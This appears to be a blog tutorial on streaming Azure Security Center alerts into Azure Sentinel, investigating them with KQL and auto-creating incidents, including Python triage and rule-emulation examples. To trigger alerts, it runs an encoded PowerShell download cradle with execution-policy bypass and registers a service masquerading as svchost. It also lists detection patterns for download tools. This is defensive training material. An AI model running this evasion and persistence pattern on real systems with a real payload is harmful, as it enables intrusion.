
How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert

8 Min. Read

At Microsoft Ignite in November 2021, Microsoft renamed Azure Security Center and Azure Defender to Microsoft Defender for Cloud, and Azure Sentinel to Microsoft Sentinel. This article uses the names that were current when it was written.

In this article, I will show you how to connect Azure Security Center to Azure Sentinel to stream security alerts and use Kusto Query Language (KQL) to investigate an alert, and finally, I will show you how to create an analytic rule that creates incidents automatically based on alerts generated in Azure Security Center.

Introduction

Azure Security Center is a security management tool that allows you to gain insight into your security state across hybrid cloud workloads, reduce your exposure to attacks, and respond to detected threats quickly. Azure Security Center (ASC) has two main value propositions:

1) Cloud Security Posture Management (CSPM) – Helps you prevent misconfigurations and strengthen your security posture across the different types of cloud workloads and resources in Azure (IaaS, PaaS, and SaaS).

2) Cloud Workload Protection Platform (CWPP) – Protects servers against threats whether they run in Azure, on-premises, or in other clouds such as Amazon AWS or Google GCP, as well as cloud-native workloads such as Web Apps, Kubernetes, Key Vaults, SQL databases (PaaS/VM), and storage accounts.

Microsoft Azure Sentinel is a cloud-native Security Information and Event Management (SIEM) and Security Orchestration, Automation and Response (SOAR) solution. Azure Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for alert detection, threat visibility, proactive hunting, and threat response.

If you have Azure Security Center enabled in your subscription, you can start ingesting the security alerts that Security Center generates into Azure Sentinel, which gives Sentinel a rich set of threat detections. Security Center generates alerts for different resource types:

  • Alerts for IaaS Windows and Linux machines, as well as for non-Azure machines running on-premises or in other clouds.
  • Alerts for Azure App Service.
  • Alerts for Azure containers.
  • Alerts for SQL Database and SQL Data Warehouse.
  • Alerts for Azure Storage.
  • Alerts for Cosmos DB.
  • And much more…

Prerequisites

To follow this article, you need to have the following:

1) Microsoft Azure subscription. If you don’t have an Azure subscription, you can create a free one here.

2) Log Analytics Workspace – To create a new workspace, follow the instructions in Create a Log Analytics workspace.

3) Azure Security Center – Standard Tier enabled. Please note that you can use the standard tier free for 30 days.

  • A virtual machine running on Azure or on-premises with the Microsoft Monitoring Agent (MMA) agent installed and in a healthy state. Check the following article to learn more on how to onboard Windows machines to Security Center.

4) Azure Sentinel enabled and connected to the Log Analytics workspace.

Connect Azure Security Center

Assuming you have all the prerequisites in place, follow the instructions below to stream your security alerts from Azure Security Center into Azure Sentinel:

1) Open Azure Portal and sign in with a user who has (contributor) privileges for the workspace on which Azure Sentinel is enabled as well as the resource group.

2) Under the All services option, type Sentinel, and click Azure Sentinel, as shown in the screenshot below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 1

3) On the Azure Sentinel workspaces blade, click the workspace that you created earlier.

4) When the Azure Sentinel – Overview dashboard opens, click Data Connectors under Configuration in the left navigation pane.

5) In the Search by name or provider field, start typing Azure Security Center, and then click on Azure Security Center. Then click on the Open connector page as shown in the screenshot below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 2

6) The Azure Security Center connector page opens. Under the Configuration section, next to the subscription that has the Azure Security Center standard tier enabled, click Connect, as shown in the screenshot below. You can connect more than one subscription; every subscription with the standard tier enabled appears in the Subscription list.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 3

7) The Connection Status will temporarily appear as Connecting…, and once it is finished, it will appear as Connected as shown in the screenshot below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 4

8) After confirming that it is connected, you can close the Azure Security Center page, and on the Data Connectors page, click Refresh; you will see that the Azure Security Center connector status appears as Connected as shown in the screenshot below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 5

At this point, every security alert that Azure Security Center triggers for the connected subscription(s) is streamed into the SecurityAlert table of the Azure Sentinel workspace.

Investigating alerts in Azure Sentinel

To simulate an alert in Security Center and investigate it in Azure Sentinel, I will run a series of commands within the virtual machine guest OS assuming that the attacker has already compromised the system.

Logon to the VM, open a command prompt (cmd) with administrative privileges, and run the following set of commands:

rem Staging folder for the "downloaded" payload
mkdir c:\temp
rem Encoded PowerShell; the Base64 (UTF-16LE) string decodes to: powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }"
powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJgAgAHsAIABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALgBzAHkAcwBpAG4AdABlAHIAbgBhAGwAcwAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AUwB5AHMAbQBvAG4ALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAGMAOgBcAHQAZQBtAHAAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIAB9ACIA"
rem Register and start a service whose name mimics svchost and whose binary lives outside System32
sc.exe create "svvchost" binpath= "c:\temp\svchost.exe"
sc.exe start svvchost

The intent of these commands is to simulate an attacker who downloads a file from an external location and saves it locally under a name that mimics a Windows system binary. The -nop and -exec bypass switches are the short forms of -NoProfile and -ExecutionPolicy Bypass. The -EncodedCommand parameter does not encode anything itself: it tells PowerShell that its argument is a Base64-encoded (UTF-16LE) command, a technique attackers use to hide the real command line from casual inspection. Decoded, the string reads: powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }". It downloads the Sysmon (System Monitor) tool by Sysinternals and saves the archive as C:\temp\svchost.exe, after which sc.exe registers that file as a service named svvchost and tries to start it. The download itself is harmless, and the service start fails because the file is a ZIP archive rather than an executable, but the sequence (encoded PowerShell, a download cradle, a file named like a system binary outside System32, a look-alike service name) is exactly what the detections key on.

By the time you finish running the commands above, you should see a sequence of alerts under Security Center | THREAT PROTECTION | Security alerts similar to the ones below. This is where Azure Security Center's behavioral analytics earns its keep: it matches the activity against known malicious patterns rather than relying on a file signature.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 6

Switch back to the Azure Sentinel – Overview dashboard, click Data Connectors under Configuration in the left navigation pane, and then click Azure Security Center. The connector page now shows the data received, as in the screenshot below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 7

Next, you need to access the workspace from Azure Sentinel and perform some queries using Kusto Query Language (KQL).

Within the same Azure Sentinel – Overview dashboard, under General click Logs.

On the Logs page, under New Query 1*, type SecurityAlert and click the Run button. You should see all security alerts collected in the last 24 hours (the default time range). The result should look similar to the image below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 8

To narrow the results to the alerts raised by the simulation, type the query below and click Run. It lists every alert generated by Azure Security Center whose name contains the keyword “suspicious”. Note that the KQL contains operator is case-insensitive, so “Suspicious” matches as well; use contains_cs if you need a case-sensitive match.

SecurityAlert | where AlertName contains "suspicious"

If you click and open any of the results and then expand the ExtendedProperties, you will see the full details where you can investigate further and understand the behavior of this suspicious command line. The results should be similar to the screenshot below:

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 9
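The encoded command from the simulation above is also what you find under ExtendedProperties when you open the alert in Sentinel, and it is far easier to judge once decoded. The Python script below is an added example, not part of the original article and not Microsoft tooling: it decodes a -EncodedCommand payload (Base64 over UTF-16LE text) and flags the indicators an analyst checks on such a command line. The ENCODED string is the one used in the simulation; the switch regexes, the list of impersonated binary names, the benign comparison command line and the score are assumptions made for this example.

```python
"""Decode and triage a PowerShell -EncodedCommand command line.

Added example, not from the original article. ENCODED is the string used in the
simulation above; the regexes, the impersonated-binary list and the score are
this example's assumptions.
"""
import base64
import re

# Encoded payload exactly as passed to -EncodedCommand in the simulation above.
ENCODED = (
    "cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJgAgAHsAIABpAHcAcgAgAGgAdAB0AHAAcwA6AC8A"
    "LwBkAG8AdwBuAGwAbwBhAGQALgBzAHkAcwBpAG4AdABlAHIAbgBhAGwAcwAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AUwB5AHMA"
    "bQBvAG4ALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAGMAOgBcAHQAZQBtAHAAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUA"
    "IAB9ACIA"
)

# The full command line as typed in the simulation above.
SIMULATED_CMDLINE = f'powershell -nop -exec bypass -EncodedCommand "{ENCODED}"'

# Binaries attackers commonly impersonate with look-alike names or paths (assumption).
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# powershell.exe accepts unambiguous prefixes of its switches, so match the short forms too.
_ENCODED_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)"?', re.I)
_EXECPOL_RE = re.compile(r"-(?:executionpolicy|exec|ex|ep)\s+bypass\b", re.I)
_NOPROFILE_RE = re.compile(r"-(?:noprofile|nop)\b", re.I)
_DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadfile|downloadstring|curl|wget|bitsadmin)\b",
    re.I,
)
_OUTFILE_RE = re.compile(r'-outfile\s+"?([^\s"]+)', re.I)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text, so decode as utf-16-le, not UTF-8."""
    padded = b64 + "=" * (-len(b64) % 4)  # tolerate payloads with the padding stripped
    return base64.b64decode(padded).decode("utf-16-le")


def triage_cmdline(cmdline: str) -> dict:
    """Decode any embedded payload and flag the indicators an analyst looks for."""
    decoded = None
    m = _ENCODED_RE.search(cmdline)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = None  # keep going; the encoded_command flag below still fires
    # Scan both the outer command line and the decoded payload for the remaining indicators.
    scan = cmdline + "\n" + (decoded or "")
    indicators = {
        "encoded_command": m is not None,
        "execution_policy_bypass": bool(_EXECPOL_RE.search(cmdline)),
        "no_profile": bool(_NOPROFILE_RE.search(cmdline)),
        "download_cradle": bool(_DOWNLOAD_RE.search(scan)),
        "masquerading_system_binary": False,
    }
    out = _OUTFILE_RE.search(scan)
    if out:
        path = out.group(1).lower()
        name = path.rsplit("\\", 1)[-1]
        # A system binary name written anywhere other than the real system directories.
        indicators["masquerading_system_binary"] = (
            name in SYSTEM_BINARY_NAMES and not path.startswith(SYSTEM_DIRS)
        )
    return {"decoded": decoded, "indicators": indicators, "score": sum(indicators.values())}


if __name__ == "__main__":
    result = triage_cmdline(SIMULATED_CMDLINE)
    print("decoded :", result["decoded"])
    for flag, hit in result["indicators"].items():
        print(f"{'!' if hit else ' '} {flag}")
    print("score   :", result["score"])
```

Run it against the Command Line value copied from ExtendedProperties; the score is only a triage aid, but any command line that trips both encoded_command and download_cradle deserves a look at what else ran on the host in the same minute.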

If you want to get started with Kusto Query Language (KQL), I highly recommend bookmarking the new official page for KQL quick reference guide.

If you want additional guided examples on how to simulate and investigate alerts in Azure Security Center and Azure Sentinel, I highly recommend checking the Threat Hunting Playbooks published by Microsoft.

Create an incident from alerts

After you have connected the Azure Security Center data source to Azure Sentinel, you want to be notified when something suspicious happens. To help you to do this, Azure Sentinel lets you create advanced alert rules that generate incidents that you can assign and investigate.

Please note that alerts triggered in Microsoft security solutions connected to Azure Sentinel, such as Azure Security Center, Microsoft Cloud App Security, and Azure Advanced Threat Protection (ATP), do not automatically create incidents in Azure Sentinel. By default, when you connect a Microsoft security solution to Azure Sentinel, each alert generated by that service is stored as raw data in the SecurityAlert table of your Azure Sentinel workspace. You can then query that data like any other raw data you connect to Sentinel.

For this example, I will create Azure Sentinel incidents automatically from high-severity Azure Security Center alerts. You can also follow the same process to create incident rules based on medium and low severity alerts.

Assuming you have all the prerequisites in place, take now the following steps.

1) Open Azure Portal and sign in with a user who has (contributor) privileges for the workspace on which Azure Sentinel is enabled as well as the resource group.

2) Under the All services option, type Sentinel, and click Azure Sentinel.

3) Select the desired Log Analytics workspace, once Azure Sentinel – Overview dashboard opens, click Analytics under Configuration in the left navigation pane to see the ‘Active rules‘ as shown in the below screenshot.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 10

4) In the Analytics page, select the ‘Rule templates‘ tab to see all of the built-in analytic rules, and then in the ‘Search’ field type ‘Azure Security Center‘ as shown in the below screenshot.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 11

5) Choose ‘Create incidents based on Azure Security Center alerts‘ with severity ‘High‘, click on ‘+ Create‘, and then select ‘Microsoft incident creation rule‘ as shown in the below screenshot.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 12

6) In the ‘Analytic rule wizard – Create new rule‘ page, enter the name and description under the ‘Analytic rule details‘ section and make sure the status is set to ‘Enabled‘. Under the ‘Analytic rule logic‘ section, select ‘Azure Security Center‘ as the Microsoft security service, choose ‘Custom‘ for the severity filter, and select ‘High‘. You can adjust the rule logic and severity to your needs, and you can also ‘Include‘ or ‘Exclude‘ specific alerts by name. When ready, click ‘Next: Review >‘ to continue.

7) In the ‘Review and create‘ page review your settings and then click ‘Create‘.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 13

Once the analytic rule is saved successfully, it will be visible under the ‘Active rules‘ tab.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 14
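To make the rule's filters concrete before you save it, here is an added example (not Sentinel's own code, and not from the original article) that replays the 'Microsoft incident creation rule' configured above over a handful of SecurityAlert rows. The rows are constructed for the example and are not real telemetry; the matching semantics (exact ProviderName, a set of allowed severities, case-insensitive 'contains' on the alert name for include and exclude) and the de-duplication by SystemAlertId are this example's reading of the wizard options, not a documented Sentinel guarantee.

```python
"""Emulate Sentinel's 'Microsoft incident creation rule' over SecurityAlert rows.

Added example, not Sentinel's own code. SAMPLE_ALERTS is constructed for the
example; the filter semantics are this example's assumptions about the wizard.
"""
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class IncidentRule:
    """Fields that correspond to the wizard: security service, severity filter, include/exclude."""
    provider: str = "Azure Security Center"
    severities: frozenset = frozenset({"High"})
    include_names: tuple = ()   # if non-empty, only alerts whose name contains one of these
    exclude_names: tuple = ()   # alerts whose name contains one of these never open incidents


# Constructed SecurityAlert rows (a subset of the table's columns); not real telemetry.
SAMPLE_ALERTS = [
    {"TimeGenerated": "2021-11-10T09:01:00Z", "SystemAlertId": "a1",
     "ProviderName": "Azure Security Center", "AlertSeverity": "High",
     "AlertName": "Suspicious PowerShell Activity Detected", "CompromisedEntity": "vm-lab-01",
     "ExtendedProperties": json.dumps({"Command Line": "powershell -nop -exec bypass -EncodedCommand cABv...",
                                       "User Name": "LAB\\admin"})},
    {"TimeGenerated": "2021-11-10T09:01:30Z", "SystemAlertId": "a1",   # re-ingested copy of a1
     "ProviderName": "Azure Security Center", "AlertSeverity": "High",
     "AlertName": "Suspicious PowerShell Activity Detected", "CompromisedEntity": "vm-lab-01",
     "ExtendedProperties": json.dumps({"Command Line": "powershell -nop -exec bypass -EncodedCommand cABv...",
                                       "User Name": "LAB\\admin"})},
    {"TimeGenerated": "2021-11-10T09:02:00Z", "SystemAlertId": "a2",
     "ProviderName": "Azure Security Center", "AlertSeverity": "Medium",
     "AlertName": "Suspicious process name detected", "CompromisedEntity": "vm-lab-01",
     "ExtendedProperties": "{}"},
    {"TimeGenerated": "2021-11-10T09:03:00Z", "SystemAlertId": "a3",
     "ProviderName": "Azure Security Center", "AlertSeverity": "High",
     "AlertName": "Suspicious service installation", "CompromisedEntity": "vm-lab-01",
     "ExtendedProperties": json.dumps({"Service Name": "svvchost"})},
    {"TimeGenerated": "2021-11-10T09:04:00Z", "SystemAlertId": "a4",
     "ProviderName": "Azure Active Directory Identity Protection", "AlertSeverity": "High",
     "AlertName": "Anonymous IP address", "CompromisedEntity": "user@contoso.com",
     "ExtendedProperties": "{}"},
    {"TimeGenerated": "2021-11-10T09:05:00Z", "SystemAlertId": "a5",
     "ProviderName": "Azure Security Center", "AlertSeverity": "High",
     "AlertName": "Test alert - not a real threat", "CompromisedEntity": "vm-lab-01",
     "ExtendedProperties": "{}"},
]


def _name_contains(name: str, patterns) -> bool:
    """Case-insensitive 'contains' match, the example's reading of the wizard's name filter."""
    return any(p.lower() in name.lower() for p in patterns)


def alert_matches(rule: IncidentRule, alert: dict) -> bool:
    """Apply the rule's filters in the order the wizard presents them."""
    if alert["ProviderName"] != rule.provider:
        return False
    if alert["AlertSeverity"] not in rule.severities:
        return False
    if rule.include_names and not _name_contains(alert["AlertName"], rule.include_names):
        return False
    if rule.exclude_names and _name_contains(alert["AlertName"], rule.exclude_names):
        return False
    return True


def create_incidents(rule: IncidentRule, alerts: list) -> list:
    """One incident per matching alert; a second row with the same SystemAlertId is skipped
    (that de-duplication is this example's choice, not a documented Sentinel guarantee)."""
    incidents, seen = [], set()
    for alert in sorted(alerts, key=lambda a: a["TimeGenerated"]):
        if not alert_matches(rule, alert) or alert["SystemAlertId"] in seen:
            continue
        seen.add(alert["SystemAlertId"])
        props = json.loads(alert.get("ExtendedProperties") or "{}")
        incidents.append({
            "alert_id": alert["SystemAlertId"],
            "title": alert["AlertName"],
            "severity": alert["AlertSeverity"],
            "entity": alert["CompromisedEntity"],
            "command_line": props.get("Command Line"),  # what you expand under ExtendedProperties
        })
    return incidents


if __name__ == "__main__":
    for inc in create_incidents(IncidentRule(), SAMPLE_ALERTS):
        print(f"[{inc['severity']}] {inc['title']} on {inc['entity']} (alert {inc['alert_id']})")
```

With the default rule (High only) the sample yields three incidents: the two Security Center High alerts from the simulation and the test alert, while the duplicate row, the Medium alert and the Azure AD alert are dropped. Adding "Test alert" to exclude_names is the kind of tuning the wizard's Exclude option exists for; the include option is the inverse and is the safer choice when you only want a narrow class of alerts to page anyone.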

Validate auto incidents creation

Once the custom analytic rule is created, you can simulate and create a new alert in Security Center as described in the previous section.

Once the alert is triggered, you can visualize it on Azure Sentinel | Incidents page as shown in the below screenshot, and then proceed with the investigation and assignment.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 15

That’s it.

How it works…

You can use the built-in rules available in Azure Sentinel to choose which connected Microsoft security solutions should create Azure Sentinel incidents automatically in real-time. You can also edit the rules to define more specific options for filtering which of the alerts generated by the Azure Security Center should create incidents in Azure Sentinel.

Please note that you can also enable incident generation automatically during the data source connection process to Azure Sentinel as shown below.

How To Connect Azure Security Center To Azure Sentinel and Investigate an Alert 16

When you connect Azure Security Center or other Microsoft security solutions, you can select whether you want the alerts from the security solution to automatically generate incidents on Azure Sentinel | Incidents page.

Pricing

Before connecting data sources to Azure Sentinel, it is important to understand the potential costs of doing so. The following Microsoft-generated logs and alerts, Azure Security Center alerts included, can be ingested into both Azure Sentinel and Azure Monitor Log Analytics free of charge:

  • Azure Activity Logs
  • Office 365 Audit Logs including all SharePoint activity and Exchange admin activity
  • Alerts from Microsoft Threat Protection products: Azure Security Center, Office 365 ATP, Azure ATP, Microsoft Defender ATP, Microsoft Cloud App Security, and Azure Information Protection.

Please note that Azure Active Directory (AAD) audit data is not free and is billed for ingestion into both Azure Sentinel, and Azure Monitor Log Analytics.

For full details of Azure Sentinel pricing including ingestion and storage costs, please check the official pricing page here.

Summary

As you have seen in this article, connecting Azure Security Center to Azure Sentinel gives you more insight into your organization’s network and systems: you can view dashboards, create custom alerts, run automated playbooks, and further investigate any suspicious activity. To learn more about Azure Security Center, check the official documentation from Microsoft.

The power of Azure Sentinel comes from the ability to detect, investigate, and remediate threats. To do this, you must first ingest data in the form of alerts from different security providers, such as Azure Security Center or other Microsoft solutions, as well as other third-party solutions. To learn more about Azure Sentinel, check the official documentation from Microsoft.

So why not connect Azure Security Center to Azure Sentinel free of charge?

Thank you for reading my blog.

If you have any questions or feedback, please leave a comment.

-Charbel Nemnom-

About the Author
Charbel Nemnom
Charbel Nemnom is a Senior Cloud Architect, Swiss Certified ICT Security Expert, Certified Cloud Security Professional (CCSP), Certified Information Security Manager (CISM), Microsoft Most Valuable Professional (MVP), and Microsoft Certified Trainer (MCT). He has over 20 years of broad IT experience serving on and guiding technical teams to optimize the performance of mission-critical enterprise systems with extensive practical knowledge of complex systems build, network design, business continuity, and cloud security.

